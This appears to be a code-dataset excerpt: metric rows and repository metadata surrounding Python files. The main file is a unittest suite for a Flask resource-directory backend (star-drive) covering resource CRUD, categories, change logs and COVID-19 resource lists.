| 21.222222 | 40 | 0.659686 | 24 | 191 | 5.041667 | 0.666667 | 0.214876 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.225131 | 191 | 8 | 41 | 23.875 | 0.817568 | 0.183246 | 0 | 0 | 0 | 0 | 0.192857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 |
0
| 6 |
07354a91e0ab5c683999d760204ed42f5952201f
| 15,695 |
py
|
Python
|
backend/tests/test_resources.py
|
sartography/star-drive
|
c0f33378d42913c3e677e07f74eb46d7b2b82a0a
|
[
"MIT"
] | null | null | null |
backend/tests/test_resources.py
|
sartography/star-drive
|
c0f33378d42913c3e677e07f74eb46d7b2b82a0a
|
[
"MIT"
] | 368 |
2018-12-18T14:43:20.000Z
|
2022-03-02T02:54:18.000Z
|
backend/tests/test_resources.py
|
sartography/star-drive
|
c0f33378d42913c3e677e07f74eb46d7b2b82a0a
|
[
"MIT"
] | 2 |
2019-10-02T03:06:06.000Z
|
2020-10-05T16:53:48.000Z
|
import unittest
from flask import json
from tests.base_test import BaseTest
from app import db, elastic_index
from app.model.resource import Resource
from app.model.resource_category import ResourceCategory
from app.model.resource_change_log import ResourceChangeLog
from app.model.user import Role
class TestResources(BaseTest, unittest.TestCase):
def test_resource_basics(self):
self.construct_resource()
r = db.session.query(Resource).first()
self.assertIsNotNone(r)
r_id = r.id
rv = self.app.get('/api/resource/%i' % r_id,
follow_redirects=True,
content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(response["id"], r_id)
self.assertEqual(response["title"], 'A+ Resource')
self.assertEqual(response["description"], 'A delightful Resource destined to create rejoicing')
def test_modify_resource_basics(self):
self.construct_resource()
r = db.session.query(Resource).first()
self.assertIsNotNone(r)
r_id = r.id
rv = self.app.get('/api/resource/%i' % r_id, content_type="application/json")
response = json.loads(rv.get_data(as_text=True))
response['title'] = 'Edwarardos Lemonade and Oil Change'
response['description'] = 'Better fluids for you and your car.'
response['website'] = 'http://sartography.com'
orig_date = response['last_updated']
rv = self.app.put('/api/resource/%i' % r_id, data=self.jsonify(response), content_type="application/json",
follow_redirects=True, headers=self.logged_in_headers())
self.assert_success(rv)
rv = self.app.get('/api/resource/%i' % r_id, content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(response['title'], 'Edwarardos Lemonade and Oil Change')
self.assertEqual(response['description'], 'Better fluids for you and your car.')
self.assertEqual(response['website'], 'http://sartography.com')
self.assertNotEqual(orig_date, response['last_updated'])
def test_delete_resource(self):
r = self.construct_resource()
r_id = r.id
rv = self.app.get('api/resource/%i' % r_id, content_type="application/json")
self.assert_success(rv)
rv = self.app.delete('api/resource/%i' % r_id, content_type="application/json", headers=self.logged_in_headers())
self.assert_success(rv)
rv = self.app.get('api/resource/%i' % r_id, content_type="application/json")
self.assertEqual(404, rv.status_code)
def test_delete_resource_with_admin_note_and_no_elastic_record(self):
r = self.construct_resource()
r_id = r.id
rv = self.app.get('api/resource/%i' % r_id, content_type="application/json")
self.assert_success(rv)
self.construct_admin_note(user=self.construct_user(), resource=r)
elastic_index.remove_document(r, 'Resource')
rv = self.app.delete('api/resource/%i' % r_id, content_type="application/json", headers=self.logged_in_headers())
self.assert_success(rv)
rv = self.app.get('api/resource/%i' % r_id, content_type="application/json")
self.assertEqual(404, rv.status_code)
def test_create_resource(self):
resource = {'title': "Resource of Resources", 'description': "You need this resource in your life.",
'organization_name': "Resource Org"}
rv = self.app.post('api/resource', data=self.jsonify(resource), content_type="application/json",
follow_redirects=True, headers=self.logged_in_headers())
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(response['title'], 'Resource of Resources')
self.assertEqual(response['description'], 'You need this resource in your life.')
self.assertIsNotNone(response['id'])
def test_get_resource_by_category(self):
c = self.construct_category()
r = self.construct_resource()
cr = ResourceCategory(resource=r, category=c, type='resource')
db.session.add(cr)
db.session.commit()
rv = self.app.get(
'/api/category/%i/resource' % c.id,
content_type="application/json",
headers=self.logged_in_headers())
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(1, len(response))
self.assertEqual(r.id, response[0]["resource_id"])
self.assertEqual(r.description, response[0]["resource"]["description"])
def test_get_resource_by_category_includes_category_details(self):
c = self.construct_category(name="c1")
c2 = self.construct_category(name="c2")
r = self.construct_resource()
cr = ResourceCategory(resource=r, category=c, type='resource')
cr2 = ResourceCategory(resource=r, category=c2, type='resource')
db.session.add_all([cr, cr2])
db.session.commit()
rv = self.app.get(
'/api/category/%i/resource' % c.id,
content_type="application/json",
headers=self.logged_in_headers())
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(r.id, response[0]["resource_id"])
self.assertEqual(2,
len(response[0]["resource"]["resource_categories"]))
self.assertEqual(
"c1", response[0]["resource"]["resource_categories"][0]["category"]
["name"])
def test_category_resource_count(self):
c = self.construct_category()
r = self.construct_resource()
cr = ResourceCategory(resource=r, category=c, type='resource')
db.session.add(cr)
db.session.commit()
rv = self.app.get(
'/api/category/%i' % c.id, content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(1, response["resource_count"])
def test_get_category_by_resource(self):
c = self.construct_category()
r = self.construct_resource()
cr = ResourceCategory(resource=r, category=c, type='resource')
db.session.add(cr)
db.session.commit()
rv = self.app.get(
'/api/resource/%i/category' % r.id,
content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(1, len(response))
self.assertEqual(c.id, response[0]["id"])
self.assertEqual(c.name, response[0]["category"]["name"])
def test_add_category_to_resource(self):
c = self.construct_category()
r = self.construct_resource()
rc_data = {"resource_id": r.id, "category_id": c.id}
rv = self.app.post(
'/api/resource_category',
data=self.jsonify(rc_data),
content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(c.id, response["category_id"])
self.assertEqual(r.id, response["resource_id"])
def test_set_all_categories_on_resource(self):
c1 = self.construct_category(name="c1")
c2 = self.construct_category(name="c2")
c3 = self.construct_category(name="c3")
r = self.construct_resource()
rc_data = [
{
"category_id": c1.id
},
{
"category_id": c2.id
},
{
"category_id": c3.id
},
]
rv = self.app.post(
'/api/resource/%i/category' % r.id,
data=self.jsonify(rc_data),
content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(3, len(response))
rc_data = [{"category_id": c1.id}]
rv = self.app.post(
'/api/resource/%i/category' % r.id,
data=self.jsonify(rc_data),
content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(1, len(response))
def test_remove_category_from_resource(self):
self.test_add_category_to_resource()
rv = self.app.delete('/api/resource_category/%i' % 1)
self.assert_success(rv)
rv = self.app.get(
'/api/resource/%i/category' % 1, content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(0, len(response))
def test_resource_change_log_types(self):
u = self.construct_user(email="editor@sartorgraphy.com", role=Role.admin)
r = {'id': 258, 'title': "A Resource that is Super and Great", 'description': "You need this resource in your life."}
rv = self.app.post('api/resource', data=self.jsonify(r), content_type="application/json",
follow_redirects=True, headers=self.logged_in_headers())
self.assert_success(rv)
logs = ResourceChangeLog.query.all()
self.assertIsNotNone(logs[-1].resource_id)
self.assertIsNotNone(logs[-1].user_id)
self.assertEqual(logs[-1].type, 'create')
rv = self.app.get('api/resource/%i' % r['id'], content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
response['title'] = 'Super Great Resource'
rv = self.app.put('/api/resource/%i' % r['id'], data=self.jsonify(response), content_type="application/json",
follow_redirects=True, headers=self.logged_in_headers(user=u))
self.assert_success(rv)
rv = self.app.get('/api/resource/%i' % r['id'], content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(response['title'], 'Super Great Resource')
logs = ResourceChangeLog.query.all()
self.assertIsNotNone(logs[-1].resource_id)
self.assertIsNotNone(logs[-1].user_id)
self.assertEqual(logs[-1].type, 'edit')
rv = self.app.delete('api/resource/%i' % r['id'], content_type="application/json",
headers=self.logged_in_headers())
self.assert_success(rv)
logs = ResourceChangeLog.query.all()
self.assertIsNotNone(logs[-1].resource_id)
self.assertIsNotNone(logs[-1].user_id)
self.assertEqual(logs[-1].type, 'delete')
def test_get_resource_change_log_by_resource(self):
r = self.construct_resource()
u = self.construct_user(email="editor@sartorgraphy.com", role=Role.admin)
rv = self.app.get('api/resource/%i' % r.id, content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
response['title'] = 'Super Great Resource'
rv = self.app.put('/api/resource/%i' % r.id, data=self.jsonify(response), content_type="application/json",
follow_redirects=True, headers=self.logged_in_headers(user=u))
self.assert_success(rv)
rv = self.app.get('/api/resource/%i/change_log' % r.id, content_type="application/json", headers=self.logged_in_headers())
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(response[-1]['user_id'], u.id)
def test_get_resource_change_log_by_user(self):
r = self.construct_resource()
u = self.construct_user(email="editor@sartorgraphy.com", role=Role.admin)
rv = self.app.get('api/resource/%i' % r.id, content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
response['title'] = 'Super Great Resource'
rv = self.app.put('/api/resource/%i' % r.id, data=self.jsonify(response), content_type="application/json",
follow_redirects=True, headers=self.logged_in_headers(user=u))
self.assert_success(rv)
rv = self.app.get('/api/user/%i/resource_change_log' % u.id, content_type="application/json", headers=self.logged_in_headers())
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(response[-1]['resource_id'], r.id)
def test_covid19_resource_lists(self):
self.construct_resource(covid19_categories=['COVID-19_for_Autism', 'Free_educational_resources'])
self.construct_resource(covid19_categories=['COVID-19_for_Autism', 'Edu-tainment', 'Free_educational_resources'])
self.construct_resource(covid19_categories=['COVID-19_for_Autism', 'Edu-tainment', 'Supports_with_Living'])
self.construct_resource(covid19_categories=['COVID-19_for_Autism', 'Edu-tainment', 'Visual_Aids'])
self.construct_resource(covid19_categories=['COVID-19_for_Autism', 'Edu-tainment', 'Health_and_Telehealth'])
rv = self.app.get('api/resource/covid19/COVID-19_for_Autism', content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(len(response), 5)
rv = self.app.get('api/resource/covid19/Edu-tainment', content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(len(response), 4)
rv = self.app.get('api/resource/covid19/Free_educational_resources', content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(len(response), 2)
rv = self.app.get('api/resource/covid19/Supports_with_Living', content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(len(response), 1)
rv = self.app.get('api/resource/covid19/Visual_Aids', content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(len(response), 1)
rv = self.app.get('api/resource/covid19/Health_and_Telehealth', content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(len(response), 1)
def test_is_uva_education_content(self):
self.construct_resource(is_draft=True, title='Autism at UVA', is_uva_education_content=True)
self.construct_resource(is_draft=False, title='Healthy Eating', is_uva_education_content=True)
self.construct_resource(is_draft=True, title='Autism and the Arts', is_uva_education_content=False)
self.construct_resource(is_draft=False, title='Autism One', is_uva_education_content=True)
self.construct_resource(is_draft=False, title='Two', is_uva_education_content=False)
rv = self.app.get('api/resource/education', content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(len(response), 2)
rv = self.app.get('api/resource', content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(len(response), 5)
| 47.274096 | 135 | 0.649761 | 2,008 | 15,695 | 4.885956 | 0.083665 | 0.024462 | 0.035776 | 0.100703 | 0.833554 | 0.790847 | 0.774335 | 0.741617 | 0.720925 | 0.69789 | 0 | 0.007947 | 0.214272 | 15,695 | 331 | 136 | 47.416918 | 0.787626 | 0 | 0 | 0.595156 | 0 | 0 | 0.181395 | 0.041733 | 0 | 0 | 0 | 0 | 0.294118 | 1 | 0.058824 | false | 0 | 0.027682 | 0 | 0.089965 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
0768ed6923c47dbe150e783f6cd01fa2f7c9e54c
| 41 |
py
|
Python
|
EduData/Task/__init__.py
|
BAOOOOOM/EduData
|
affa465779cb94db00ed19291f8411229d342c0f
|
[
"Apache-2.0"
] | 98 |
2019-07-05T03:27:36.000Z
|
2022-03-30T08:38:09.000Z
|
EduData/Task/__init__.py
|
BAOOOOOM/EduData
|
affa465779cb94db00ed19291f8411229d342c0f
|
[
"Apache-2.0"
] | 45 |
2020-12-25T03:49:43.000Z
|
2021-11-26T09:45:42.000Z
|
EduData/Task/__init__.py
|
BAOOOOOM/EduData
|
affa465779cb94db00ed19291f8411229d342c0f
|
[
"Apache-2.0"
] | 50 |
2019-08-17T05:11:15.000Z
|
2022-03-29T07:54:13.000Z
|
# coding: utf-8
# 2019/8/23 @ tongshiwei
| 13.666667 | 24 | 0.658537 | 7 | 41 | 3.857143 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.235294 | 0.170732 | 41 | 2 | 25 | 20.5 | 0.558824 | 0.878049 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
4aeb5cb919a70c0ac2be053ebf69b329fe3c2ae2
| 109 |
py
|
Python
|
tests/test_advanced.py
|
dhaitz/python-package-template
|
b4c636e48ae192e5efe30fe71af37be6f8273d29
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_advanced.py
|
dhaitz/python-package-template
|
b4c636e48ae192e5efe30fe71af37be6f8273d29
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_advanced.py
|
dhaitz/python-package-template
|
b4c636e48ae192e5efe30fe71af37be6f8273d29
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-

from .context import sample


def test_thoughts():
    assert sample.hmm() is None
| 13.625 | 32 | 0.642202 | 15 | 109 | 4.6 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011364 | 0.192661 | 109 | 7 | 33 | 15.571429 | 0.772727 | 0.192661 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |